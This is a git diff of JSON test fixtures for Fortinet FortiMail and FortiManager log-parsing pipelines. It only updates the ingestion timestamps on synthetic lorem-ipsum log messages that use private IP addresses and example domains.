pri=low user=iameaque ui=identsun action=deny status=aquio msg=\"rspicia\"", "event": { - "ingested": "2021-06-29T09:33:00.526854800Z" + "ingested": "2021-12-09T13:37:30.096292200Z" }, "tags": [ "preserve_original_event" @@ -642,7 +642,7 @@ }, "message": "date=2018-2-24 time=19:26:15 device_id=uiineavo log_id=sistena log_part=uidexeac type=virus subtype=infected pri=high from=\"amquisno\" to=modoc client_name=\"magnam3267.corp\" client_ip=\"10.95.32.86\" session_id=\"Bonorum\" msg=lesti", "event": { - "ingested": "2021-06-29T09:33:00.526859900Z" + "ingested": "2021-12-09T13:37:30.096298300Z" }, "tags": [ "preserve_original_event" @@ -654,7 +654,7 @@ }, "message": "date=2018-3-11 time=02:28:49 device_id=lupta log_id=byC log_part=imadm type=spam pri=low session_id=\"nci\" from=\"orroquis\" to=\"ulapa\" subject=\"iumdo\" msg=\"iusmodit\"", "event": { - "ingested": "2021-06-29T09:33:00.526865100Z" + "ingested": "2021-12-09T13:37:30.096304500Z" }, "tags": [ "preserve_original_event" 
@@ -666,7 +666,7 @@ }, "message": "date=2018-3-25 time=09:31:24 device_id=obeataev log_id=umf log_part=olesti type=event subtype=config pri=low user=quaeabil ui=emip module=aturQu submodule=itesse msg=\"iamqui\"", "event": { - "ingested": "2021-06-29T09:33:00.526871500Z" + "ingested": "2021-12-09T13:37:30.096310500Z" }, "tags": [ "preserve_original_event" @@ -678,7 +678,7 @@ }, "message": "date=2018-4-8 time=16:33:58 device_id=inim log_id=etdol log_part=Sed type=event subtype=pop3 pri=very-high user=tten ui=etur action=allow status=mipsumqu msg=\"eprehen\"", "event": { - "ingested": "2021-06-29T09:33:00.526875300Z" + "ingested": "2021-12-09T13:37:30.096316700Z" }, "tags": [ "preserve_original_event" @@ -690,7 +690,7 @@ }, "message": "date=2018-4-22 time=23:36:32 device_id=itaedict log_id=olorema log_part=rep type=event subtype=update pri=low msg=ptatemse", "event": { - "ingested": "2021-06-29T09:33:00.526880500Z" + "ingested": "2021-12-09T13:37:30.096322800Z" }, "tags": [ "preserve_original_event" @@ -702,7 +702,7 @@ }, "message": "date=2018-5-7 time=06:39:06 device_id=eleumi log_id=edic log_part=udexerc type=event subtype=pop3 pri=low user=olabori ui=odic action=block status=lica msg=secil", "event": { - "ingested": "2021-06-29T09:33:00.526886400Z" + "ingested": "2021-12-09T13:37:30.096328800Z" }, "tags": [ "preserve_original_event" @@ -714,7 +714,7 @@ }, "message": "date=2018-5-21 time=13:41:41 device_id=nimadmin log_id=midest log_part=modt type=event subtype=update pri=very-high msg=tocca", "event": { - "ingested": "2021-06-29T09:33:00.526890Z" + "ingested": "2021-12-09T13:37:30.096334800Z" }, "tags": [ "preserve_original_event" 
@@ -726,7 +726,7 @@ }, "message": "date=2018-6-4 time=20:44:15 device_id=usant log_id=mipsumq log_part=ident type=event subtype=config pri=very-high user=sequatD ui=ercitati(10.40.89.185) module=temse submodule=caecat msg=\"cusanti\"", "event": { - "ingested": "2021-06-29T09:33:00.526893900Z" + "ingested": "2021-12-09T13:37:30.096340900Z" }, "tags": [ "preserve_original_event" @@ -738,7 +738,7 @@ }, "message": "date=2018-6-19 time=03:46:49 device_id=conseq log_id=itame log_part=tenat type=virus subtype=infected pri=very-high from=\"yCiceroi\" to=\"nostrum\" client_name=\"orroquis5179.local\" client_ip=\"10.252.96.71\" session_id=\"tvolu\" msg=\"dutper\"", "event": { - "ingested": "2021-06-29T09:33:00.526899Z" + "ingested": "2021-12-09T13:37:30.096347Z" }, "tags": [ "preserve_original_event" @@ -750,7 +750,7 @@ }, "message": "date=2018-7-3 time=10:49:23 device_id=ugiatqu log_id=eruntmo log_part=nimve type=virus subtype=infected pri=very-high from=natus to=boreet client_name=\"luptasnu757.www.home\" client_ip=\"10.174.210.232\" session_id=ovolupta msg=\"volup\"", "event": { - "ingested": "2021-06-29T09:33:00.526903300Z" + "ingested": "2021-12-09T13:37:30.096355800Z" }, "tags": [ "preserve_original_event" @@ -762,7 +762,7 @@ }, "message": "date=2018-7-17 time=17:51:58 device_id=Bonoru log_id=rcitati log_part=nula type=event subtype=imap pri=medium user=deomni ui=adipi(10.120.232.62) action=block status=ntutl msg=\"volupt\"", "event": { - "ingested": "2021-06-29T09:33:00.526909700Z" + "ingested": "2021-12-09T13:37:30.096362300Z" }, "tags": [ "preserve_original_event" @@ -774,7 +774,7 @@ }, "message": "date=2018-8-1 time=00:54:32 device_id=mquameiu log_id=loremq log_part=turmagni type=event subtype=imap pri=very-high user=emUtenim ui=ende action=block status=amnis msg=rvelil", "event": { - "ingested": "2021-06-29T09:33:00.526970600Z" + "ingested": "2021-12-09T13:37:30.096368400Z" }, "tags": [ "preserve_original_event" 
@@ -786,7 +786,7 @@ }, "message": "date=2018-8-15 time=07:57:06 device_id=rumetMa log_id=mexerci log_part=urEx type=virus subtype=file-signature pri=medium liq to=abore src=10.200.225.45 session_id=dol msg=exe", "event": { - "ingested": "2021-06-29T09:33:00.526998100Z" + "ingested": "2021-12-09T13:37:30.096374600Z" }, "tags": [ "preserve_original_event" @@ -798,7 +798,7 @@ }, "message": "date=2018-8-29 time=14:59:40 device_id=audant log_id=rspicia log_part=pitl type=statistics pri=high session_id=mmod client_name=taevit4968.mail.local client_ip=10.144.111.42 dst_ip=10.62.61.1 from=lam hfrom=asnu to=com polid=rep domain=mveni5084.internal.local mailer=num resolved=ctetura src_type=quaerat direction=inbound virus=umexer disposition=amnih classifier=tper message_length=pisciv subject=tconsect", "event": { - "ingested": "2021-06-29T09:33:00.527006100Z" + "ingested": "2021-12-09T13:37:30.096380700Z" }, "tags": [ "preserve_original_event" @@ -810,7 +810,7 @@ }, "message": "date=2018-9-12 time=22:02:15 device_id=emipsumq log_id=culpaq log_part=quamq type=event subtype=pop3 pri=medium user=emvel ui=pta(10.183.213.223) action=block status=hend msg=remagna", "event": { - "ingested": "2021-06-29T09:33:00.527009800Z" + "ingested": "2021-12-09T13:37:30.096386300Z" }, "tags": [ "preserve_original_event" @@ -822,7 +822,7 @@ }, "message": "date=2018-9-27 time=05:04:49 device_id=lauda log_id=plicaboN log_part=dolo type=virus subtype=file-signature pri=medium from=\"elit\" to=sam src=\"tMal [10.52.190.18]\" session_id=isni msg=quid", "event": { - "ingested": "2021-06-29T09:33:00.527015300Z" + "ingested": "2021-12-09T13:37:30.096390100Z" }, "tags": [ "preserve_original_event" 
@@ -834,7 +834,7 @@ }, "message": "date=2018-10-11 time=12:07:23 device_id=inibus log_id=secte log_part=ctobeat type=event subtype=config pri=low user=iqui ui=animide module=pid submodule=itanimi msg=\"onoru\"", "event": { - "ingested": "2021-06-29T09:33:00.527020500Z" + "ingested": "2021-12-09T13:37:30.096394900Z" }, "tags": [ "preserve_original_event" @@ -846,7 +846,7 @@ }, "message": "date=2018-10-25 time=19:09:57 device_id=naaliq log_id=plica log_part=asiarc type=event subtype=imap pri=low user=seq ui=snula(10.203.110.206) action=deny status=dipi msg=ecatc", "event": { - "ingested": "2021-06-29T09:33:00.527026600Z" + "ingested": "2021-12-09T13:37:30.096400600Z" }, "tags": [ "preserve_original_event" @@ -858,7 +858,7 @@ }, "message": "date=2018-11-9 time=02:12:32 device_id=dolo log_id=velites log_part=oloremi type=virus_file-signature pri=high apari to=tsunt src=\"caecat [10.108.10.197]\" session_id=enim msg=\"Attachment file (umq) has sha1 hash value: sistena\"", "event": { - "ingested": "2021-06-29T09:33:00.527033900Z" + "ingested": "2021-12-09T13:37:30.096405800Z" }, "tags": [ "preserve_original_event" @@ -870,7 +870,7 @@ }, "message": "date=2018-11-23 time=09:15:06 device_id=imipsam log_id=eumiu log_part=tatevel type=event subtype=smtp pri=high user=quisnostui=sequines(10.115.154.104) action=cancelstatus=lorumsession_id=\"suntexpl\" msg=\"DSN: to \u003c\u003ciqu\u003e; reason:success; sessionid:tatis\"", "event": { - "ingested": "2021-06-29T09:33:00.527041200Z" + "ingested": "2021-12-09T13:37:30.096410100Z" }, "tags": [ "preserve_original_event" 
@@ -882,7 +882,7 @@ }, "message": "date=2018-12-7 time=16:17:40 device_id=econ log_id=aborio log_part=rve type=event subtype=smtp pri=medium user=nbyCiui=runtmollaction=blockstatus=velillumsession_id=\"ionev\" msg=\"to=\u003c\u003cvitaedi\u003e, delay=rna, xdelay=cons, mailer=ipv6-icmp, pri=lupta, relay=olaboris3175.internal.home[10.250.94.95], dsn=tno, stat=imvenia\"", "event": { - "ingested": "2021-06-29T09:33:00.527048500Z" + "ingested": "2021-12-09T13:37:30.096415Z" }, "tags": [ "preserve_original_event" @@ -894,7 +894,7 @@ }, "message": "date=2018-12-21 time=23:20:14 device_id=atevelit log_id=ugitsed log_part=dminimve type=virus subtype=file-signature pri=very-high from=\"onse\" to=uiac src=tquii [10.164.49.95] session_id=emeumfu msg=\"inBCSedu\"", "event": { - "ingested": "2021-06-29T09:33:00.527055900Z" + "ingested": "2021-12-09T13:37:30.096421400Z" }, "tags": [ "preserve_original_event" @@ -906,7 +906,7 @@ }, "message": "date=2019-1-5 time=06:22:49 device_id=ddo log_id=emp log_part=inBC type=event subtype=smtp pri=low user=eacommui=aboNem(10.11.45.141) action=allowstatus=remasession_id=\"mcol\"msg=\"STARTTLS=tion, cert-subject=umquia, cert-issuer=lorsita, verifymsg=spici\"", "event": { - "ingested": "2021-06-29T09:33:00.527063Z" + "ingested": "2021-12-09T13:37:30.096426Z" }, "tags": [ "preserve_original_event" @@ -918,7 +918,7 @@ }, "message": "date=2019-1-19 time=13:25:23 device_id=odit log_id=vol log_part=epteurs type=statistics pri=very-high session_id=\"cteturad\" client_name=\"modi6930.internal.test[10.60.164.100]\"dst_ip=\"10.161.1.146\" from=\"etconse\" to=\"nproiden\" polid=\"ionem\" domain=\"taevitae6868.www.corp\" subject=\"ehende\" mailer=\"rep\" resolved=\"nostru\" direction=\"internal\" virus=\"ipiscin\" disposition=\"trudexe\" classifier=\"qua\" message_length=modit", "event": { - "ingested": "2021-06-29T09:33:00.527107300Z" + "ingested": "2021-12-09T13:37:30.096430500Z" }, "tags": [ "preserve_original_event" 
@@ -930,7 +930,7 @@ }, "message": "date=2019-2-2 time=20:27:57 device_id=orsit log_id=deFinibu log_part=iaecons type=event subtype=admin pri=very-high user=rautod ui=onorumet(10.157.118.41) action=cancel status=chit reason=unknown msg=\"erspici\"", "event": { - "ingested": "2021-06-29T09:33:00.527110700Z" + "ingested": "2021-12-09T13:37:30.096434300Z" }, "tags": [ "preserve_original_event" @@ -942,7 +942,7 @@ }, "message": "date=2019-2-17 time=03:30:32 device_id=quidol log_id=tinv log_part=Utenima type=statistics pri=high session_id=temqu client_name=uradip7802.mail.example client_ip=10.44.35.57 dst_ip=10.93.239.216 from=vento hfrom=litsed to=ciun polid=rehender domain=tetura7106.www5.corp mailer=eosquir resolved=tqu src_type=emips direction=internal virus=tinvolu disposition=ptat classifier=amquisn message_length=Finibus subject=nsequat", "event": { - "ingested": "2021-06-29T09:33:00.527116200Z" + "ingested": "2021-12-09T13:37:30.096439100Z" }, "tags": [ "preserve_original_event" @@ -954,7 +954,7 @@ }, "message": "date=2019-3-3 time=10:33:06 device_id=evelite log_id=remquela log_part=toreve type=event subtype=update pri=high msg=\"dolor\"", "event": { - "ingested": "2021-06-29T09:33:00.527120800Z" + "ingested": "2021-12-09T13:37:30.096445300Z" }, "tags": [ "preserve_original_event" @@ -966,7 +966,7 @@ }, "message": "date=2019-3-17 time=17:35:40 device_id=itse log_id=lapari log_part=Bonor type=event subtype=update pri=medium msg=exeaco", "event": { - "ingested": "2021-06-29T09:33:00.527124600Z" + "ingested": "2021-12-09T13:37:30.096451500Z" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ }, "message": "date=2019-4-1 time=00:38:14 device_id=emvele log_id=tNeq log_part=olorsita type=virus_file-signature pri=medium eleumiu to=etdol src=\"imadmin [10.123.154.140]\" session_id=liqu msg=dolor", "event": { - "ingested": "2021-06-29T09:33:00.527128400Z" + "ingested": "2021-12-09T13:37:30.096457600Z" }, "tags": [ "preserve_original_event" 
@@ -990,7 +990,7 @@ }, "message": "date=2019-4-15 time=07:40:49 device_id=aliq log_id=utem log_part=oreetd type=event subtype=imap pri=very-high user=mremape ui=ude action=deny status=emac msg=rmagnido", "event": { - "ingested": "2021-06-29T09:33:00.527132200Z" + "ingested": "2021-12-09T13:37:30.096463600Z" }, "tags": [ "preserve_original_event" @@ -1002,7 +1002,7 @@ }, "message": "date=2019-4-29 time=14:43:23 device_id=pariatur log_id=cita log_part=tvo type=event subtype=admin pri=high user=rve ui=atemacc(10.141.108.1) action=deny status=ciunt reason=success msg=\"beataevi\"", "event": { - "ingested": "2021-06-29T09:33:00.527136900Z" + "ingested": "2021-12-09T13:37:30.096469700Z" }, "tags": [ "preserve_original_event" @@ -1014,7 +1014,7 @@ }, "message": "date=2019-5-13 time=21:45:57 device_id=imaven log_id=dmin log_part=sum type=event subtype=system pri=low user=lore ui=nim action=cancel status=edquiac msg=psamvolu", "event": { - "ingested": "2021-06-29T09:33:00.527140700Z" + "ingested": "2021-12-09T13:37:30.096475900Z" }, "tags": [ "preserve_original_event" @@ -1026,7 +1026,7 @@ }, "message": "date=2019-5-28 time=04:48:31 device_id=iade log_id=tae log_part=obe type=event subtype=admin pri=medium user=ulapari ui=rittenby(10.31.31.193) action=deny status=nvol reason=unknown msg=\"luptatem\"", "event": { - "ingested": "2021-06-29T09:33:00.527144700Z" + "ingested": "2021-12-09T13:37:30.096482Z" }, "tags": [ "preserve_original_event" @@ -1038,7 +1038,7 @@ }, "message": "date=2019-6-11 time=11:51:06 device_id=conse log_id=ruredolo log_part=ati type=event subtype=system pri=low user=olors ui=roid(10.234.156.8) action=block status=uteiru msg=\"xer\"", "event": { - "ingested": "2021-06-29T09:33:00.527148700Z" + "ingested": "2021-12-09T13:37:30.096488100Z" }, "tags": [ "preserve_original_event" 
@@ -1050,7 +1050,7 @@ }, "message": "date=2019-6-25 time=18:53:40 device_id=nvol log_id=uame log_part=quia type=event subtype=update pri=very-high msg=\"labor\"", "event": { - "ingested": "2021-06-29T09:33:00.527152200Z" + "ingested": "2021-12-09T13:37:30.096494200Z" }, "tags": [ "preserve_original_event" @@ -1062,7 +1062,7 @@ }, "message": "date=2019-7-10 time=01:56:14 device_id=mwritte log_id=modit log_part=quamnih type=event subtype=config pri=medium user=itanimid ui=uiin module=nibusBo submodule=iusm msg=\"nostru\"", "event": { - "ingested": "2021-06-29T09:33:00.527157800Z" + "ingested": "2021-12-09T13:37:30.096500300Z" }, "tags": [ "preserve_original_event" @@ -1074,7 +1074,7 @@ }, "message": "date=2019-7-24 time=08:58:48 device_id=vel log_id=preh log_part=madmini type=event subtype=update pri=high msg=edutpers", "event": { - "ingested": "2021-06-29T09:33:00.527163Z" + "ingested": "2021-12-09T13:37:30.096506400Z" }, "tags": [ "preserve_original_event" @@ -1086,7 +1086,7 @@ }, "message": "date=2019-8-7 time=16:01:23 device_id=sBonoru log_id=everi log_part=squ type=virus subtype=file-signature pri=medium from=\"utla\" to=nse src=10.160.236.78 session_id=nostrude msg=\"Attachment file (rinc) has sha1 hash value: tno\"", "event": { - "ingested": "2021-06-29T09:33:00.527169500Z" + "ingested": "2021-12-09T13:37:30.096512600Z" }, "tags": [ "preserve_original_event" @@ -1098,7 +1098,7 @@ }, "message": "date=2019-8-21 time=23:03:57 device_id=cid log_id=nonproi log_part=dolor type=event subtype=admin pri=medium user=molli ui=oeiusm(10.244.19.62) action=accept status=nnumquam reason=unknown msg=\"tdolore\"", "event": { - "ingested": "2021-06-29T09:33:00.527176700Z" + "ingested": "2021-12-09T13:37:30.096518700Z" }, "tags": [ "preserve_original_event" 
@@ -1110,7 +1110,7 @@ }, "message": "date=2019-9-5 time=06:06:31 device_id=icta log_id=epteu log_part=nvent type=event subtype=webmail pri=high user=mquiavol ui=odiconse(10.147.52.164) action=allow status=untutl msg=ugiatnul", "event": { - "ingested": "2021-06-29T09:33:00.527184Z" + "ingested": "2021-12-09T13:37:30.096524900Z" }, "tags": [ "preserve_original_event" @@ -1122,7 +1122,7 @@ }, "message": "date=2019-9-19 time=13:09:05 device_id=quaturve log_id=elaudant log_part=olup type=spam pri=high session_id=\"iacon\" client_name= \"ncu3839.www.localhost\" client_ip=\"10.201.105.58\" dst_ip=\"10.251.183.113\" from=\"ent\" to=\"ionemu\" subject=\"eseosqu\" msg=\"uptatem\"", "event": { - "ingested": "2021-06-29T09:33:00.527191200Z" + "ingested": "2021-12-09T13:37:30.096531Z" }, "tags": [ "preserve_original_event" @@ -1134,7 +1134,7 @@ }, "message": "date=2019-10-3 time=20:11:40 device_id=eprehen log_id=oinB log_part=lor type=statistics pri=low session_id=\"citatio\" client_name=\"[10.209.203.156]\"dst_ip=\"10.132.139.98\" from=\"pariat\" to=\"borisnis\" direction=\"unknown\" virus=\"oremagn\" disposition=\"emagna\" classifier=\"uidolor\" message_length=remag", "event": { - "ingested": "2021-06-29T09:33:00.527198400Z" + "ingested": "2021-12-09T13:37:30.096535600Z" }, "tags": [ "preserve_original_event" @@ -1146,7 +1146,7 @@ }, "message": "date=2019-10-18 time=03:14:14 device_id=tiumtot log_id=ulamcola log_part=epr type=event subtype=admin pri=low user=nculpa ui=enbyCice(10.152.196.145) action=block status=uptas reason=success msg=\"iadeseru\"", "event": { - "ingested": "2021-06-29T09:33:00.527205500Z" + "ingested": "2021-12-09T13:37:30.096540500Z" }, "tags": [ "preserve_original_event" 
@@ -1158,7 +1158,7 @@ }, "message": "date=2019-11-1 time=10:16:48 device_id=equ log_id=turadip log_part=ataev type=virus_file-signature pri=medium from=\"oree\" to=\"nimadmi\" src=\"utaliq [10.78.38.143]\" session_id=qui msg=\"Attachment file (epteurs) has sha1 hash value: did\"", "event": { - "ingested": "2021-06-29T09:33:00.527212800Z" + "ingested": "2021-12-09T13:37:30.096546200Z" }, "tags": [ "preserve_original_event" @@ -1170,7 +1170,7 @@ }, "message": "date=2019-11-15 time=17:19:22 device_id=sunt log_id=orumSe log_part=olupta type=event subtype=update pri=very-high msg=pta", "event": { - "ingested": "2021-06-29T09:33:00.527220Z" + "ingested": "2021-12-09T13:37:30.096551500Z" }, "tags": [ "preserve_original_event" @@ -1182,7 +1182,7 @@ }, "message": "date=2019-11-30 time=00:21:57 device_id=ntutlabo log_id=leumiure log_part=tasnu type=event subtype=smtp pri=high user=amquaui=tionevol(10.209.124.81) action=allowstatus=tobesession_id=\"ssequa\" log_part=emp msg=\"to=\u003c\u003cemoeni, delay=officiad, xdelay=veniam, mailer=igmp, pri=entoreve, relay=ion3339.www.localdomain\"", "event": { - "ingested": "2021-06-29T09:33:00.527227400Z" + "ingested": "2021-12-09T13:37:30.096555800Z" }, "tags": [ "preserve_original_event" @@ -1194,7 +1194,7 @@ }, "message": "date=2019-12-14 time=07:24:31 device_id=int log_id=oremagn log_part=rnatur type=virus pri=medium from=uptatev to=\"oditem\" src=\"10.176.31.145\" session_id=\"ineavo\" msg=reseo", "event": { - "ingested": "2021-06-29T09:33:00.527234500Z" + "ingested": "2021-12-09T13:37:30.096560800Z" }, "tags": [ "preserve_original_event" diff --git a/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json index a132bdf67af..a326353e5c5 100644 --- a/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json 
+++ b/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json @@ -6,7 +6,7 @@ }, "message": "logver=iusm devname=\"modtempo\" devid=\"olab\" vd=nto date=2016-1-29 time=6:09:59 logid=sse type=exercita subtype=der level=very-high eventtime=odoco logtime=ria srcip=10.20.234.169 srcport=1001 srcintf=eth5722 srcintfrole=vol dstip=10.44.173.44 dstport=6125 dstintf=enp0s3068 dstintfrole=nseq poluuid=itinvol sessionid=psa proto=21 action=allow policyid=ntium policytype=psaq crscore=13.800000 craction=eab crlevel=aliqu appcat=Ute service=lupt srccountry=dolore dstcountry=sequa trandisp=abo tranip=10.189.58.145 tranport=5273 duration=14.119000 sentbyte=7880 rcvdbyte=449 sentpkt=mqui app=nci", "event": { - "ingested": "2021-06-29T09:33:01.618087300Z" + "ingested": "2021-12-09T13:37:31.906792100Z" }, "tags": [ "preserve_original_event" 
@@ -18,7 +18,7 @@ }, "message": "date=2016-2-12 time=1:12:33 logver=litesse devid=orev devname=pisciv logid=uii type=umexe subtype=estlabo level=high vd=iatnu srcip=10.182.84.248 srcport=4880 srcintf=enp0s208 dstip=10.162.33.193 dstport=7200 dstintf=enp0s2581 poluuid=nulapari sessionid=mwritten proto=prm action=accept policyid=uidolor trandisp=nibus duration=72.226000 sentbyte=6378 rcvdbyte=3879 devtype=riosam osname=anonnu osversion=1.410 mastersrcmac=ameaqu srcmac=01:00:5e:84:66:6c crscore=145.047000 craction=squame crlevel=ntex eventtype=eius user=luptat service=emape hostname=aer445.host profile=eumiu reqtype=uame url=https://www.example.net/orisn/cca.htm?ofdeF=metcons#roinBCS direction=external msg=com method=eataevi cat=byC catdesc=tinculp device_id=tur log_id=atio pri=high userfrom=atemsequ adminprof=nci timezone=CEST main_type=eFini trigger_policy=amco sub_type=exe severity_level=iatu policy=ionofde src=10.62.4.246 src_port=189 dst=10.171.204.166 dst_port=6668 http_method=mol http_url=taspe http_host=mvolu http_agent=radip http_session_id=tNequ signature_subclass=gelit signature_id=6728 srccountry=tconsec content_switch_name=nsequat server_pool_name=taev false_positive_mitigation=roidents user_name=oluptas monitor_status=llu http_refer=https://api.example.org/tamremap/tur.html?radipis=isetq#estqui http_version=uasiarch dev_id=emaper threat_weight=ssitasp history_threat_weight=eum threat_level=sum ftp_mode=uaerat ftp_cmd=boreet cipher_suite=onev msg_id=tenima", "event": { - "ingested": "2021-06-29T09:33:01.618133600Z" + "ingested": "2021-12-09T13:37:31.906800400Z" }, "tags": [ "preserve_original_event" 
@@ -30,7 +30,7 @@ }, "message": "logver=seq dtime=2016-02-26 20:15:08.252538723 +0000 UTC devid=olorema devname=ccaecat vd=veleumi date=2016-2-26 time=8:15:08 logid=tia type=enim subtype=dqu level=medium eventtime=uian logtime=tempo srcip=10.200.188.142 srcport=4665 srcintf=eth4496 srcintfrole=eetd dstip=10.94.103.117 dstport=513 dstintf=enp0s3491 dstintfrole=doloreeu poluuid=pori sessionid=occ proto=icmp action=allow policyid=reetdolo policytype=nrepreh crscore=18.839000 craction=uiano crlevel=mrema appcat=autfu service=natura srccountry=aboris dstcountry=ima trandisp=tanimi tranip=10.15.159.80 tranport=6378 duration=121.916000 sentbyte=6517 rcvdbyte=13 sentpkt=ugiatqu app=eacomm", "event": { - "ingested": "2021-06-29T09:33:01.618141700Z" + "ingested": "2021-12-09T13:37:31.906804Z" }, "tags": [ "preserve_original_event" @@ -42,7 +42,7 @@ }, "message": "logver=liqu devname=\"lorem\" devid=\"emq\" vd=isiu date=2016-3-12 time=3:17:42 logid=nimadmi type=iatisu subtype=iat level=low eventtime=suntinc logtime=elits srcip=10.131.233.27 srcport=5037 srcintf=eth3676 srcintfrole=eataevit dstip=10.50.112.141 dstport=7303 dstintf=eth3391 dstintfrole=olab poluuid=mquisnos sessionid=loremagn proto=1 action=cancel policyid=tsed policytype=orai crscore=61.614000 craction=incididu crlevel=eci appcat=aali service=ametcons srccountry=porainc dstcountry=amquisno trandisp=iinea tranip=10.27.88.95 tranport=776 duration=5.911000 sentbyte=1147 rcvdbyte=3269 sentpkt=tvol app=moll", "event": { - "ingested": "2021-06-29T09:33:01.618145100Z" + "ingested": "2021-12-09T13:37:31.906808800Z" }, "tags": [ "preserve_original_event" 
@@ -54,7 +54,7 @@ }, "message": "date=2016-3-26 time=10:20:16 logver=inim devid=ema devname=roinBCSe logid=onse type=tae subtype=tatno level=very-high vd=oluptate srcip=10.52.54.178 srcport=4427 srcintf=lo1567 dstip=10.37.58.155 dstport=2430 dstintf=eth6096 poluuid=ciati sessionid=ercit proto=3 action=allow policyid=eniam trandisp=reetdolo duration=165.411000 sentbyte=7651 rcvdbyte=3982 devtype=rumet osname=oll osversion=1.5670 mastersrcmac=nido srcmac=01:00:5e:c3:0a:41 crscore=71.955000 craction=itlabori crlevel=Ciceroi eventtype=aveniam user=uradi service=nimadmin hostname=olo7148.mail.home profile=snulapar reqtype=aedic url=https://api.example.com/iumto/aboreetd.gif?dun=enim#saute direction=internal msg=eriame method=lorema cat=avol catdesc=labor device_id=atuse log_id=ddoeiu pri=high userfrom=idolore adminprof=onse timezone=PST main_type=tation trigger_policy=ips sub_type=emeumfug severity_level=upta policy=omn src=10.87.212.179 src_port=1758 dst=10.157.213.15 dst_port=3539 http_method=ali http_url=nsect http_host=ntutl http_agent=caecatc http_session_id=onsequat signature_subclass=siuta signature_id=2896 srccountry=loru content_switch_name=ema server_pool_name=par false_positive_mitigation=itaut user_name=rveli monitor_status=rsint http_refer=https://example.com/idestla/Nemoeni.htm?taed=lup#remeumf http_version=antiumto dev_id=strude threat_weight=ctetura history_threat_weight=usmod threat_level=edqui ftp_mode=mquidol ftp_cmd=ita cipher_suite=ipi msg_id=rsitamet", "event": { - "ingested": "2021-06-29T09:33:01.618152100Z" + "ingested": "2021-12-09T13:37:31.906814500Z" }, "tags": [ "preserve_original_event" 
@@ -66,7 +66,7 @@ }, "message": "date=2016-4-9 time=5:22:51 logver=eseru devid=remeum devname=orain logid=quip type=oin subtype=uisquam level=high vd=tinvol srcip=10.19.68.92 srcport=1409 srcintf=enp0s33 dstip=10.38.22.45 dstport=7036 dstintf=lo1120 poluuid=ditautfu sessionid=piscing proto=icmp action=accept policyid=ostr trandisp=rudexerc duration=135.013000 sentbyte=3369 rcvdbyte=927 devtype=itaut osname=imaven osversion=1.152 mastersrcmac=umdolo srcmac=01:00:5e:f7:4a:fd crscore=169.252000 craction=tfug crlevel=icab eventtype=mwr user=fugi service=inculpaq hostname=agna7678.internal.host profile=equa reqtype=mexercit url=https://www.example.net/tasuntex/sunt.txt?ume=incidi#picia direction=unknown msg=olupt method=dit cat=sumquiad catdesc=dexeaco device_id=ivelits log_id=moenimi pri=medium userfrom=etdolo adminprof=inv timezone=CEST main_type=ommod trigger_policy=sequatur sub_type=uidolo severity_level=lumquido policy=nihi src=10.114.150.67 src_port=1407 dst=10.76.73.140 dst_port=3075 http_method=uines http_url=nsec http_host=onse http_agent=emips http_session_id=imadmi signature_subclass=ostrume signature_id=6051 srccountry=eataev content_switch_name=liquide server_pool_name=uasia false_positive_mitigation=emp user_name=aperia monitor_status=ofdeFini http_refer=https://example.org/vol/riat.htm?atvol=umiur#imad http_version=msequi dev_id=isnostru threat_weight=iquaUten history_threat_weight=santium threat_level=iciatisu ftp_mode=rehender ftp_cmd=eporroqu cipher_suite=uat msg_id=tem", "event": { - "ingested": "2021-06-29T09:33:01.618157300Z" + "ingested": "2021-12-09T13:37:31.906819100Z" }, "tags": [ "preserve_original_event" 
@@ -78,7 +78,7 @@ }, "message": "logver=suntinc date=2016-4-24 time=12:25:25 log_id=xeac devid=nidolo devname=tatn logid=eli type=nnu subtype=dolo level=low vd=nse srcip=10.202.204.239 srcport=7783 srcintf=lo2857 dstip=10.147.28.176 dstport=7432 dstintf=enp0s1462 poluuid=mporain sessionid=icons proto=0 action=accept policyid=sequi trandisp=rehend duration=3.138000 sentbyte=6354 rcvdbyte=3605 devtype=numqu osname=qui osversion=1.4059 mastersrcmac=equi srcmac=01:00:5e:68:86:a1 crscore=72.701000 craction=tat crlevel=ipitla eventtype=quae user=maccusa service=uptat hostname=equep5085.mail.domain profile=aqu reqtype=rpo url=https://www.example.org/inesci/serror.html?mqu=apariat#tlabore direction=internal msg=ihilm method=atDu cat=eav catdesc=ionevo device_id=remagn log_id=run pri=very-high userfrom=iamquis adminprof=quirat timezone=CET main_type=ittenbyC trigger_policy=isc sub_type=aturve severity_level=emulla policy=mpori src=10.195.36.51 src_port=3905 dst=10.95.64.124 dst_port=7042 http_method=iadese http_url=nsectet http_host=utla http_agent=utei http_session_id=laborum signature_subclass=tionof signature_id=7613 srccountry=oin content_switch_name=lapari server_pool_name=data false_positive_mitigation=dolor user_name=nnum monitor_status=eritqu http_refer=https://internal.example.net/wri/bor.jpg?hitect=dol#leumiu http_version=namali dev_id=taevit threat_weight=rinrepre history_threat_weight=etconse threat_level=tincu ftp_mode=ari ftp_cmd=exercit cipher_suite=sci msg_id=quamnih", "event": { - "ingested": "2021-06-29T09:33:01.618179900Z" + "ingested": "2021-12-09T13:37:31.906823100Z" }, "tags": [ "preserve_original_event" 
@@ -90,7 +90,7 @@ }, "message": "logver=occae dtime=2016-05-08 07:27:59.552538723 +0000 UTC devid=ctetura devname=labore vd=texp date=2016-5-8 time=7:27:59 logid=tMalor type=acc subtype=amc level=very-high eventtime=amest logtime=corp srcip=10.176.216.90 srcport=2428 srcintf=eth2591 srcintfrole=dantiumt dstip=10.186.85.3 dstport=5366 dstintf=lo821 dstintfrole=ento poluuid=pic sessionid=evita proto=prm action=allow policyid=duntut policytype=magni crscore=102.339000 craction=uptat crlevel=uam appcat=boris service=nti srccountry=abi dstcountry=sectetur trandisp=uioffi tranip=10.114.16.155 tranport=1608 duration=62.941000 sentbyte=5110 rcvdbyte=3818 sentpkt=ipi app=reseos", "event": { - "ingested": "2021-06-29T09:33:01.618187500Z" + "ingested": "2021-12-09T13:37:31.906828Z" }, "tags": [ "preserve_original_event" 
